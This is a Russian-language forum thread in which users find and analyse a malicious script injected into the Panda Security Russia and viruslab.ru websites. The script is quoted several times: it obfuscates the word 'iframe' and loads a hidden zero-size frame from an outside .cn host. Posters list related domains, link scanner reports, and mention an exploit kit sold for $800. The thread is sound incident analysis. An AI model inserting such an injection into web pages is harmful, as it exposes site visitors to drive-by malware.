На этих двух сайтах скрипт
pandasecurity.com/russia/
viruslab.ru
[CODE]document.write('<ifr'+'ame height=\"0\" width=\"0\" style=\"display: none;\" src=\"http://gali'+'yas.c'+'n/show.php?s=0be7'+'fb3bca\"></ifr'+'ame>');[/CODE]
Printable View
На этих двух сайтах скрипт
pandasecurity.com/russia/
viruslab.ru
[CODE]document.write('<ifr'+'ame height=\"0\" width=\"0\" style=\"display: none;\" src=\"http://gali'+'yas.c'+'n/show.php?s=0be7'+'fb3bca\"></ifr'+'ame>');[/CODE]
Вебовский онлайн сканер сказал на viruslab.ru
[URL]http://online.us.drweb.com/cache/?i=e065a4818eb5052656281627f254047e[/URL]
Он у них там с 14 августа находится, причём у панды ихний автомат сам себя занёс в блек-лист :D
а у мну вместо этого
[QUOTE]
</div>
<script>document.write('<ifr'+'ame height=\"0\" width=\"0\" style=\"display: none;\" src=\"http://gali'+'yas.c'+'n/show.php?s=0be7'+'fb3bca\"></ifr'+'ame>');</script>
</div>
[/QUOTE]
оказалось это
[QUOTE]</div>
<!-- Kill AD JavaScript: "if" -->
</div>
[/QUOTE]
:). блин опять самое интересное пропускаю, жалко что galiyas точка cn/show.php?s=0be7fb3bca не работает, а так хотелось глянуть чтож-там грузить пытались :)
[QUOTE=Virtual;453330]
:). блин опять самое интересное пропускаю, жалко что galiyas точка cn/show.php?s=0be7fb3bca не работает, а так хотелось глянуть чтож-там грузить пытались :)[/QUOTE]
[URL]http://www.virustotal.com/ru/analisis/2c9a7c130610b9a7324b29e336206ab1b829e6a6284edf5b664ce2c328aae352-1250730484[/URL]
[URL]http://www.virustotal.com/ru/analisis/2c9a7c130610b9a7324b29e336206ab1b829e6a6284edf5b664ce2c328aae352-1250777968[/URL]
[URL]http://www.virustotal.com/ru/analisis/f5a4f9be44ad6bb3606bab30f03f05506a30f0018f4d0e7b7d642cbd0a27d093-1250778731[/URL]
[URL]http://www.virustotal.com/ru/analisis/73bc80a373cd46968ae434a5a5a934a9804689e24b1c8fab8fd0c7384dbfbad9-1250780189[/URL]
[url]http://www.anti-malware.ru/forum/index.php?showtopic=9263&st=0[/url]
Там еще вчера обсуждалось
Хм, они меня спрашивают
[QUOTE]Опишите подробнее почему вы так решили?[/QUOTE]
может это нормальный скрипт?
Кста galiyas точка cn/show.php?s=0be7fb3bca снова заработал
[QUOTE=valho;453495]Кста galiyas точка cn/show.php?s=0be7fb3bca снова заработал[/QUOTE]
Нет
[QUOTE=valho;453495]Хм, они меня спрашивают
может это нормальный скрипт?
Кста galiyas точка cn/show.php?s=0be7fb3bca снова заработал[/QUOTE]
у мну фильтр именно сработал на то что он не нормальный! т.к. если ктот пытается сгенерить фрейм через яву да при том разделяя слово iframe (тупая попытка спрятатся от простейших :) анализаторов трафика), кстати гисметео тож этим забавляется, то такое идет в топку.
а тут совсем странное:
[QUOTE]</div>
<script>document.write('<ifr'+'ame height=\"0\" width=\"0\" style=\"display: none;\" src=\"http://gali'+'yas.c'+'n/show.php?s=0be7'+'fb3bca\"></ifr'+'ame>');</script>
</div>[/QUOTE]
расшифровываю:
выдать в документ фрейм, при том - не засвечивая ключевого слова iframe, загрузить туда результат пхп скрипта с неизвестным содержимым, и самое главное все это должно быть нулевой ширины и нулевой высоты- тоесть невидимым. + все это грузится с сайта антивирусной компании но из кытая :)
ЗЫЗЫ пойду- ка разошлю новость что вируслаб специально пытается заразить клиентов дабы впихнуть им панду :) шутка я не злой
добавлено...
хотя.... анализируя.... это ка- же понимать или ктот имеющий админку на обоих сайтах прое..... пароли или сами всетаки, хотя без разницы,... думаю нужно будет озвучить что они это специально, чтоб неповадно было
[B]valho[/B] кто они, где они? давай их сюда, ща обьясню что там не так, :) хотя думаю прочтя данную тему и ссылки выше может и дойдет.
//простите за офтоп хорошо в деревне, с любимой тещей, до понедельника it проблемы совсем не мои, а у кое-кого чую голова болеть будет :)
и те и другие убрали его, вроде, еле уговорили :D
[size="1"][color="#666686"][B][I]Добавлено через 52 минуты[/I][/B][/color][/size]
[QUOTE=Virtual;453633][B]valho[/B] кто они, где они? давай их сюда, ща обьясню что там не так, :) хотя думаю прочтя данную тему и ссылки выше может и дойдет.
[/QUOTE]
Написал в техподдержку на viruslab.ru, это как раз они. Ещё неделю назад послал письмо на pandasecurity.com спрашивал почему у них автомат свой же сайт в блек-лист занёс, никто не ответил. Но я не догадался тогда посмотреть html страницы. Мне сеня (senyak) как раз вчера ссылу дал на антималваре, тут и вспомнил про пандасекурити.ком там как раз и оказался точно такой же скрипт.
На паре форумов нашёл объявления о продаже тулкита и правда за 800 $
предлагают
[URL]http://imageshost.ru/links/5e3310236fc3cf03f2749b8962f6164a[/URL]
[URL]http://imageshost.ru/links/ef14e8d9d14874c15f127f250b289e38[/URL]
[URL]http://imageshost.ru/links/9137e6968878a9c3899f1886aa278274[/URL]
[URL]http://imageshost.ru/links/2860db9847258fd20c8c6f7d1ee9820b[/URL]
[URL]http://imageshost.ru/links/61437fa16e0e77cd357ac693c9bc1d9a[/URL]
[URL]http://imageshost.ru/links/da18fe2865f6259f0161f71bb3fe8df2[/URL]
[size="1"][color="#666686"][B][I]Добавлено через 4 часа 6 минут[/I][/B][/color][/size]
Вот они, родненькие, все на одном адресе
galiyas.cn
fragus.cn
nasha-anasha.cn
neimeetsmysla.cn
bugagag.cn
yessvaz.cn
commada.cn
zenitvsspartak.cn
[url]http://wepawet.cs.ucsb.edu/view.php?hash=e186cd15e7af6e475b701d006ee3b002&t=1250193022&type=js[/url]
Посмотрел за ними, на панде этот скрипт убрали, потом он снова появился минут на 5 и его снова убрали. На вируслаб.ру его тоже убрали, минут через 20 он снова появился и до сих пор там живёт у них :O
всетаки они прое... пароли, + похоже конек у когото до сих пор активный :) тож мне специ млин, им давно уже пора в раздел помогите :)
Virtual +1 :L